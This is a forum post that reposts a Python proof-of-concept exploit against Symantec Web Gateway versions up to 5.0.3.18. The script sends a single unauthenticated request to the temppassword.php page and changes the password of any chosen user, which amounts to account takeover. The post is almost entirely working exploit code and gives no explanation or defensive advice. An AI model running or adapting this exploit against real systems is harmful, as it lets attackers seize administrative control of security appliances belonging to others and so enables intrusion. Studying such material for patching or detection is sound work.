Jump to content
LLegoLLaS

Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change

Recommended Posts

Posted

#!/usr/bin/python

import urllib
import urllib2
import re
import sys

print "[*] ###########################################################"
print "[*] Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change"
print "[*] @_Kc57"
print "[*] ###########################################################\n"


if (len(sys.argv) != 4):
print "Usage: poc.py <RHOST> <username> <newpassword>"
exit(0)

ip = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]

url = "https://%s/spywall/temppassword.php" % (ip)

opts = {
'target':'executive_summary.php',
'USERNAME':username,
'password':password,
'password2':password,
'Save':'Save'
}

print "[*] Sending request to server..."

data = urllib.urlencode(opts)
request = urllib2.Request(url, data)
response = urllib2.urlopen(request)

match = re.search('Your new password has been saved', response.read())

if(match):
print "[*] Password for %s changed to %s" %(username,password)
else:
print "[*] Password change failed!"

sursa:bugsearch.net

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...